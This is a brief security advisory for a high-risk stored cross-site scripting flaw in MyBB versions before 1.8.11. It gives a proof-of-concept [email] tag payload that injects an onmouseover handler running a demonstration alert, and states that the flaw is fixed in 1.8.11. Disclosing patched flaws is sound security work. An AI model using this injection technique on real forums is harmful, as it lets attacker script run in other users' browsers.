1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 |
Description: ============ product:MyBB Homepage:https://mybb.com/ vulnerableversion:<1.8.11 Severity:High risk =============== Proof of Concept: ============= 1.post a thread or reply any thread ,write: [email=2"onmouseover="alert(document.location)]hover me[/email] then when user’s mouse hover it,XSS attack will occur! ============ Fixed: ============ This vulnerability was fixed in version 1.8.11 https://blog.mybb.com/2017/04/04/mybb-1-8-11-merge-system-1-8-11-release/ ============= |